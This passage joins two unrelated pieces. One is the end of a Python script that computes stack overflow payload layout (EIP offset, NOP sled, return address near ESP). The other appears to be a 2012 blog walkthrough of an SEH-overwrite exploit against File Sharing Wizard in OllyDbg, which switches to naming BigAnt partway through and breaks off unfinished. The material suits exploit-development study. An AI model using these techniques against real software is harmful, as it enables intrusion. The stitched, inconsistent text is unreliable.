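    }


# Figures from the walkthrough above.
ESP = 0xBFFFF16C
EIP_OFFSET = 504        # 508 bytes sent and EIP fully overwritten: EIP is bytes 504..507
NOP_LEN = 323
SHELLCODE_LEN = 45      # counted from the shellcode string in the run command
ADDR_REPEATS = 35

if __name__ == "__main__":
    print("ASLR:", aslr_state("0\n"))
    dec = return_address(ESP, 200)
    hx = return_address(ESP, 0x200)
    print(f"ESP - 200   = {dec:#x} -> payload bytes {pack_address(dec)!r}")
    print(f"ESP - 0x200 = {hx:#x} -> payload bytes {pack_address(hx)!r}")
    print(check_layout(NOP_LEN, SHELLCODE_LEN, ADDR_REPEATS, EIP_OFFSET))
```

check_layout reports a 508-byte payload whose address block starts at offset 368, with the 35th copy sitting exactly at offset 504, so the payload length and the EIP offset found by fuzzing agree. Whether 0xbffff0a4 really lands inside the sled depends on where the buffer sits relative to ESP on the test machine, which is why the walkthrough turned ASLR off first.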
Wednesday, 22 February 2012
SEH and SafeSEH - EXPLOIT File Sharing Wizard
Open your File Sharing Wizard application.
After it starts, open OllyDbg, select the File Sharing Wizard process, and then attack File Sharing Wizard.
After the fuzzing, OllyDbg changes as shown below. Then we look at the SEH chain: click the View menu and select SEH chain; the result is as shown below.
Then we pass the exception from the SEH chain through to the program by pressing Shift+F9; the value of EIP changes to 41414141, as shown below.
Next we determine the module to be used: select View - Executable modules, the list below appears, and we will use LYBEAY32.dll.
Then we find the location of a POP, POP, RETN sequence in the module: open View - Executable modules, double-click LYBEAY32.dll, then right-click - Search for - Sequence of commands.
A dialog box appears; fill it in as shown below.
OllyDbg then jumps to the memory address in LYBEAY32.dll where the sequence was found,
namely the offset 77FE2346.
After we have made sure that we can use LYBEAY32.dll as the springboard, next we look at how many bytes into the buffer the SEH address is overwritten, as shown in the picture below.
Copy the pattern into the fuzzer.
After that, open OllyDbg and the BigAnt application, then run the fuzzer again as before. Then open the SEH chain and press Shift+F9.
The EIP value we get then looks like the picture below.
Still have not managed it; to be continued.